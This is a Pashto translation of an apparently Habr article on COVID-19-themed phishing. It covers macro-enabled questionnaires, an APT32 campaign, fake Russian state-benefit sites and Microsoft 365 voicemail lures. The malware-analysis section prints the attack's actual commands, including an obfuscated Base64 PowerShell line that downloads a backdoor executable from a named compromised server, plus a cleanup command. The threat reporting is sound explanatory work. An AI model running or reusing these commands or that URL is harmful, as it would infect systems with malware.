برید کونکي د COVID-19 موضوع څخه ګټه پورته کولو ته دوام ورکوي ، د کاروونکو لپاره ډیر او ډیر ګواښونه رامینځته کوي څوک چې د ناروغۍ پورې اړوند هرڅه ته لیواله دي. IN
په یاد ولرئ
ایا تاسو د COVID-19 لپاره وړیا ازموینه غواړئ؟
د کورونویرس تیم لرونکي فشینګ بله د پام وړ بیلګه وه
د میکرو فعالولو لپاره د ډیری کاروونکو قانع کول هم اسانه وو. د دې کولو لپاره، یو معیاري چل کارول شوی و: د پوښتنلیک ډکولو لپاره، تاسو لومړی د میکرو فعالولو ته اړتیا لرئ، پدې معنی چې تاسو د VBA سکریپټ چلولو ته اړتیا لرئ.
لکه څنګه چې تاسو لیدلی شئ، د VBA سکریپټ په ځانګړې توګه د انټي ویروسونو څخه ماسک شوی.
وینډوز د انتظار ځانګړتیا لري چیرې چې غوښتنلیک د ډیفالټ "هو" ځواب منلو دمخه /T <ثانوي> انتظار کوي. زموږ په قضیه کې ، سکریپټ د لنډمهاله فایلونو حذف کولو دمخه 65 ثانیې انتظار وکړ:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
او د انتظار په وخت کې، مالویر ډاونلوډ شوی و. د دې لپاره یو ځانګړی پاور شیل سکریپټ په لاره اچول شوی و:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
د Base64 ارزښت د کوډ کولو وروسته، د پاور شیل سکریپټ د آلمان څخه د مخکینۍ هیک شوي ویب سرور کې د شا دروازه ډاونلوډ کوي:
http://automatischer-staubsauger.com/feature/777777.png
او د نوم لاندې یې خوندي کوي:
C:UsersPublictmpdirfile1.exe
پوښۍ ‘C:UsersPublictmpdir’
ړنګیږي کله چې د 'tmps1.bat' فایل چلول چې کمانډ لري cmd /c mkdir ""C:UsersPublictmpdir"".
پر دولتي ادارو هدفي بریدونه
سربیره پردې ، د FireEye شنونکو پدې وروستیو کې د APT32 هدف شوي برید راپور ورکړی چې هدف یې په ووهان کې حکومتي جوړښتونه او همدارنګه د چین د بیړني مدیریت وزارت. د ویشل شوي RTFs څخه یو د نیویارک ټایمز مقالې ته یو لینک درلود چې عنوان یې دی
په زړه پورې خبره دا ده چې د کشف په وخت کې ، هیڅ یو انټي ویروس دا مثال ندی موندلی ، د ویروسټوټال په وینا.
کله چې رسمي ویب پاڼې ښکته وي
د فشینګ برید ترټولو زړه راښکونکی مثال تیره ورځ په روسیه کې پیښ شو. د دې دلیل د 3 څخه تر 16 کلونو پورې د ماشومانو لپاره د اوږدې مودې انتظار شوي ګټې ټاکل و. کله چې د 12 کال د می په 2020 نیټه د غوښتنلیکونو منلو پیل اعلان شو ، ملیونونه د اوږدې مودې انتظار شوي مرستې لپاره د دولتي خدماتو ویب پا toې ته ورغلل او پورټل یې د مسلکي DDoS برید څخه بدتر لاندې راوست. کله چې ولسمشر وویل چې "دولتي خدمات نشي کولی د غوښتنلیکونو جریان سره مقابله وکړي ،" خلکو د غوښتنلیکونو منلو لپاره د بدیل سایټ پیل کولو په اړه آنلاین خبرې پیل کړې.
ستونزه دا ده چې ډیری سایټونو په یوځل کار پیل کړی، او په داسې حال کې چې یو یې، په posobie16.gosuslugi.ru کې ریښتیا، په حقیقت کې غوښتنلیکونه مني، نور
د SearchInform همکارانو په .ru زون کې شاوخوا 30 نوي جعلي ډومینونه وموندل. Infosecurity and Softline شرکت د اپریل له پیل راهیسې له 70 څخه ډیر ورته جعلي دولتي خدماتو ویب پاڼې تعقیب کړي. د دوی جوړونکي پیژندل شوي سمبولونه سمبالوي او د ګوسسلګی، ګوسسلګی - 16، ویپلاتی، کوویډ-ویپلاتی، پوسوبی او داسې نورو کلمو ترکیبونه هم کاروي.
هایپ او ټولنیز انجینري
دا ټول مثالونه یوازې تاییدوي چې برید کونکي په بریالیتوب سره د کورونویرس موضوع منیټ کوي. او هرڅومره چې ټولنیز تاوتریخوالی او ناڅرګندې مسلې لوړې وي ، د سکیمرانو ډیر چانسونه باید مهم معلومات غلا کړي ، خلک دې ته اړ کړي چې خپلې پیسې پخپله پریږدي ، یا په ساده ډول ډیر کمپیوټرونه هیک کړي.
او دې ته په پام سره چې د وبا ناروغي احتمالي چمتو شوي خلک دې ته اړ کړي چې له کور څخه په ډله ایز ډول کار وکړي ، نه یوازې شخصي ، بلکې کارپوریټ ډیټا هم له خطر سره مخ دي. د مثال په توګه، پدې وروستیو کې د مایکروسافټ 365 (پخوانی دفتر 365) کارونکي هم د فشینګ برید سره مخ شوي. خلکو د لیکونو د ضمیمې په توګه لوی "یاد شوي" غږیز پیغامونه ترلاسه کړل. په هرصورت، فایلونه په حقیقت کې یو HTML پاڼه وه چې د برید قربانیان یې لیږلي
سرچینه: www.habr.com